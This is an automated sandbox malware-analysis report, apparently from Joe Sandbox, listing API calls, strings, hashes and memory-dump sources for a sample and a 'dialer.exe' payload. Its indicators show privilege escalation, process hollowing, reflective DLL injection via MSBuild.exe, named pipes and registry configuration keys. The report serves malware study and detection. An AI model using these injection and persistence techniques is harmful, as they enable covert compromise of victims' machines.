                                                                          • Instruction ID: 0e18025da4ab1a66d5b9328719b29663b717aa630856976929b35823c92f4430
                                                                          • Opcode Fuzzy Hash: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                          • Instruction Fuzzy Hash: 8AF0B671D0CB41C2E610EB69F84422ABB74FB8A388F405936EA9C46735CF3CE450CB61

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen
                                                                          • String ID: 0$X&$ 6
                                                                          • API String ID: 4088430540-2247980209
                                                                          • Opcode ID: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                          • Instruction ID: 5890b5e6ca471a5720de02932ebcb1c393d1e1e32d963d67e20c429ac8c92db8
                                                                          • Opcode Fuzzy Hash: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                          • Instruction Fuzzy Hash: 28523861D2C68384F711EB2DA8513F8BA60BF95388FC45233D98C566B2EF7C6245C726

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                                                          • String ID: Hc=v+$&
                                                                          • API String ID: 3825114775-1582277970
                                                                          • Opcode ID: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                          • Instruction ID: b522a7f3e8f9e11f7fe25b418d69f583ddba5cfdf29fe9e1ab43c5b2b9e37d95
                                                                          • Opcode Fuzzy Hash: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                          • Instruction Fuzzy Hash: 32412631A19A12C5F600BB1DE990379BBA5BF45788FD44033EA8D837B6DF3CA4418322

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen$wcscatwcscpywcsncmp
                                                                          • String ID: 0$X$`

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          Similarity
                                                                          • API ID: wcscatwcscpywcslen
                                                                          • String ID: $0$0$@$@

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(?,?,?,?,00007FF7EB90C8F4,00007FF7EB90C8F4,?,?,00007FF7EB900000,?,00007FF7EB901991), ref: 00007FF7EB901C63
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,00007FF7EB90C8F4,00007FF7EB90C8F4,?,?,00007FF7EB900000,?,00007FF7EB901991), ref: 00007FF7EB901CC7
                                                                          • memcpy.MSVCRT ref: 00007FF7EB901CE0
                                                                          • GetLastError.KERNEL32(?,?,?,?,00007FF7EB90C8F4,00007FF7EB90C8F4,?,?,00007FF7EB900000,?,00007FF7EB901991), ref: 00007FF7EB901D23
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                          • String ID:

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CCG

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          Similarity
                                                                          • API ID: wcslen
                                                                          • String ID: 0$@

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EB901247), ref: 00007FF7EB9019F9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          Similarity
                                                                          • API ID: fprintf
                                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:

                                                                          Execution Graph

                                                                          Execution Coverage: 45.4%
                                                                          Dynamic/Decrypted Code Coverage: 0%
                                                                          Signature Coverage: 40.1%
                                                                          Total number of Nodes: 227
                                                                          Total number of Limit Nodes: 25

                                                                          Callgraph

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                          • API String ID: 4177739653-1130149537
                                                                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                          • API String ID: 2561231171-3753927220
                                                                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                          • String ID:
                                                                          • API String ID: 4084875642-0
                                                                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                          • String ID:
                                                                          • API String ID: 3197395349-0
                                                                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                          • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                            • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                            • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 000000014000163D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                            • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 0000000140001651
                                                                          • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                          • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                                          • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                          • String ID:
                                                                          • API String ID: 1323846700-0
                                                                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                          • String ID: .text$C:\Windows\System32\
                                                                          • API String ID: 2721474350-832442975
                                                                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                          • String ID: M$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2203880229-3489460547
                                                                          • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                          • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                          • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                          • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 2071455217-3440882674
                                                                          • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                          • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                          • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                          • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

Control-flow Graph
• Function: 140002b38; APIs in graph: GetProcessHeap, HeapAlloc, K32EnumProcesses, Sleep; calls 140002540 (graph rendering not reproduced)
APIs
Memory Dump Source
• Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: Heap$AllocProcess$EnumProcessesSleep
• String ID:
• API String ID: 3676546796-0
• Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
• Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
• Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
• Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

Control-flow Graph
• Function: 1400018ac; APIs in graph: OpenProcess, IsWow64Process, CloseHandle (graph rendering not reproduced)
APIs
Memory Dump Source
• Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: Process$CloseHandleOpenWow64
• String ID:
• API String ID: 10462204-0
• Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
• Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
• Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
• Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

Control-flow Graph
• Function: 140002258; APIs in graph: ExitProcess; calls 14000226c (graph rendering not reproduced)
APIs
  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
  • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
  • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
  • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
  • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
  • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
  • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
  • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
  • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
  • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
  • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
  • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
  • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
  • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
  • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
• ExitProcess.KERNEL32 ref: 0000000140002263
Memory Dump Source
• Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
• String ID:
• API String ID: 3836936051-0
• Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
• Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
• Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
• Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

Control-flow Graph
• Function: 140002560; APIs in graph: GetProcessHeap, HeapAlloc, HeapFree, K32EnumProcesses, ReadFile, RegOpenKeyExW, RegDeleteValueW, ShellExecuteW, lstrlenW, ExitProcess; calls 140001000, 1400010c0, 1400014d8, 1400016cc, 14000175c, 1400017ec, 1400018ac, 140001944, 1400019c4, 140001c88, 14000217c, 1400021a8, 140002a90 (graph rendering not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
• String ID: SOFTWARE$dialerstager$open
• API String ID: 3276259517-3931493855
• Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
• Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
• Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
• Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

Control-flow Graph
• Function: 140001c88; APIs in graph: CreateProcessW, VirtualAllocEx, WriteProcessMemory, VirtualAlloc, GetThreadContext, SetThreadContext, ResumeThread, OpenProcess, TerminateProcess (graph rendering not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
